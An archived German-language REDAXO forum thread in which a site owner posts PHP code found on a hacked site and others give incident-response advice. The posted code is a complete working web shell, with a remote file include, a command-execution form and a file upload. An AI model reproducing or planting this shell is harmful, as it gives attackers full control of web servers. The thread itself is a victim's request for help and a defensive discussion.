[phpBB Debug] PHP Warning: in file [ROOT]/ext/tas2580/seourls/event/listener.php on line 213: Undefined array key "FORUM_NAME"
Meine Seite wurde gehackt - REDAXO Forum
Hallo,

Wir haben in letzter Zeit festgestellt, dass die Kommunikation via Slack viel schneller und zielführender ist als ein Beitrag im Forum. Aufgrund der neuen und besseren Möglichkeiten der Kommunikation haben wir uns entschlossen das Forum nur noch als Archiv zur Verfügung zu stellen. Somit bleibt es weiterhin möglich hier nach Lösungen zu suchen. Neue Beiträge können nicht mehr erstellt werden.

Wir empfehlen, für deine Fragen/Probleme Slack zu nutzen. Dort sind viele kompetente Benutzer aktiv und beantworten jegliche Fragen, gerne auch von REDAXO-Anfängern! Slack wird von uns sehr intensiv und meistens "rund um die Uhr" benutzt :-)
Selbst einladen kannst Du dich hier: https://redaxo.org/slack/
Antworten
coolieprobst1
Beiträge: 1
Registriert: 2. Sep 2009, 09:08

Meine Seite wurde gehackt

2. Sep 2009, 09:15

Habe heute Morgen folgenden Code auf meiner Seite gefunden:
echo "<!-- the bunny is running over the ocean -->";

if (isset ($_REQUEST["cr4nk"])){
include($_REQUEST["cr4nk"]);
exit;
}

echo '<html>
<style type="text/css">
body {
font-family:Fixedsys;
font-size:3px;
color:#00ff00;
BACKGROUND-COLOR: #000000;
margin:0px;
padding:0px;
}
textarea {
BORDER: #00ff00 1px solid;
BACKGROUND-COLOR: #000000;
font: Fixedsys bold;
color: #00ff00;
}
</style>
<body>
<html>
<div style="border-bottom:solid 1px #00ff00;width:100%">
<b>software:</b> '.getenv("SERVER_SOFTWARE").'<br>
<b>uname -a:</b> '.php_uname().'<br>
<b>safe-mode:</b> ';

$safemode = @ini_get("safe_mode"); echo (($safe_mode)?("<font color=red>ON</font>"):("OFF"));

echo '
</div>
<div style="border-bottom:solid 1px #00ff00;width:100%">
<div style="margin:6px;margin-left:150px;">
<div style="float:left; margin-right:10px;"><form method="post"><input type="text" name="cmd" size="95"><input type=submit value="Exec"></form></div>
<div><form enctype="multipart/form-data" method="post"><input type="file" name="file"><input type=submit value="Upload"></form></div>
</div>
</div>
<div style="margin-left:150px;margin-top:5px";>
<textarea cols="121" rows="15">';

if (isset ($_POST['cmd'])){
$cfe = $_POST['cmd'];
$res = '';
if (!empty($cfe))
{
if(function_exists('exec'))
{
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec'))
{
$res = @shell_exec($cfe);
}
elseif(function_exists('system'))
{
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru'))
{
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r")))
{
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}
}
echo $res;
}


if (isset ($_FILES['file']['tmp_name'])){
$tempname = $_FILES['file']['tmp_name'];
$name = $_FILES['file']['name'];
if(copy("$tempname", "$name")){
echo "File uploaded";
}
else {
echo "File not uploaded!";
}
}

echo '
Ich habe leider noch redaxo 3.* installiert. Wahrscheinlich wurde eine code-injection vorgenommen.
Soll ich am besten auf redaxo 4 updaten? Oder hat jemand einen Quickfix für die 3er Version.
Benutzeravatar
anita
Beiträge: 711
Registriert: 25. Jan 2007, 10:25
Wohnort: Finsterwalde

2. Sep 2009, 11:10

hallo,

mich interessiert mal, wie wirkt sich das auf das System aus, also was ist infolgedessen passiert?
Gruß Anita

javanita engineering, immer eine zündende Idee
http://www.javanita.com
zehbaeh
Beiträge: 556
Registriert: 17. Okt 2006, 11:52
Wohnort: Solingen

2. Sep 2009, 11:42

Für verschiedene 3er Versionen gibt es auch verschiedene Sicherheitspatches (siehe Download/Sicherheit).
Die werden aber eher wenig nützen.
1. Was vom geposteten Code hast Du gefunden. A. Die ersten Scriptkiddie Zeilen, B. den gesamten Code?
2. Aus welcher Datei stammen die Zeilen?
3. Wo liegt diese Datei?
4. Wie lautet die genaue Redaxo Version?

Allgemein: Unabhängig von 1.A oder 1.B, die Installation sollte komplett entfernt und neu aufgesetzt werden, das schliesst auch eine Durchsicht sämtlicher Module/Templates in der DB ein.
Der Provider sollte informiert werden, damit dieser ggf. weitere Prüfungen vornehmen kann.
Sämtliche FTP-Passwörter sollten geändert werden.
Sämtliche Rechner aller Personen mit FTP-Zugang sollten auf Trojaner/Keylogger geprüft werden.
Alle Passwörter für geschützte Bereiche müssen geändert werden, das schliesst alle Redaxo-Benutzer Passwörter ein.
Benutzeravatar
Xong
Beiträge: 2081
Registriert: 5. Jun 2008, 08:30
Wohnort: Halle (Saale)

2. Sep 2009, 11:46

zehbaeh hat geschrieben:Alle Passwörter für geschützte Bereiche müssen geändert werden, das schliesst alle Redaxo-Benutzer Passwörter ein.
Nur wenn die Passwörter unverschlüsselt gespeichert wurden.
Wenn sha1 genutzt wurde, hat der Angreifer herzlich wenig Chancen eine Kollision zu finden.
LG,
Xong

[ externes Bild ] Määääääääääääääääääääääääh!
zehbaeh
Beiträge: 556
Registriert: 17. Okt 2006, 11:52
Wohnort: Solingen

2. Sep 2009, 12:10

Xong hat geschrieben:
zehbaeh hat geschrieben:Alle Passwörter für geschützte Bereiche müssen geändert werden, das schliesst alle Redaxo-Benutzer Passwörter ein.
Nur wenn die Passwörter unverschlüsselt gespeichert wurden.
Wenn sha1 genutzt wurde, hat der Angreifer herzlich wenig Chancen eine Kollision zu finden.
Wenn ich als Angreifer in der Lage bin beliebigen Code auf dem Server einzuschleusen, lese ich die übertragenen Passwörter im Klartext mit, da ist mir die verwendete Methode zum erzeugen des Hash reichlich egal.)
Abgesehen davon:
http://www.heise.de/security/SHA-1-gekn ... dung/56507
Antworten

Zurück zu „Sonstiges“